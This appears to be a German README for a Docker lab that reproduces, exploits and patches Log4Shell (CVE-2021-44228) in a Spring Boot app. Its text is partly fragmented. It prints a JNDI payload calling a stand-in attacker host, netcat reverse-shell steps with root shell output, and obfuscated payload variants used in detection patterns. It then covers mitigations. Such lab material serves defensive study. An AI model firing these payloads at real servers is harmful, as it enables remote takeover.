
Log4Shell (CVE-2021-44228) PoC
Reproduzieren, ausnutzen und beheben einer bekannten kritischen CVE in einer Docker-Umgebung.
Dieses PoC demonstriert CVE-2021-44228 (Log4Shell) in einer Spring Boot-Anwendung.
CVE: 2021-44228
CVSS: 10.0 (Kritisch)
Betroffene Komponente: Apache Log4j (<= 2.14.1)
${...}), um Werte in Logmeldungen dynamisch aufzulösen.${jndi:ldap://attacker.com:1389/a}.Exploit.class.Exploit.class über HTTP ab.Exploit läuft und erzeugt eine Reverse-Shell zurück zum Angreifer.make build start
nc -l 4444
make exploit
/bin/sh: can't access tty; job control turned off
$ id
uid=0(root) gid=0(root) groups=0(root) ...
make patch
make build start
nc -l 4444
make exploit
# -> observe no reverse shell
${jndi:-Muster) mit einer WAF oder Middleware.-Dlog4j2.formatMsgNoLookups=true
-Dcom.sun.jndi.ldap.object.trustURLCodebase=false
gradle dependencies, Snyk, Wiz, etc.).log4j-core-*.jar, einschließlich fat JARs.${jndi:...}, ${${lower:j}ndi:...}, etc.).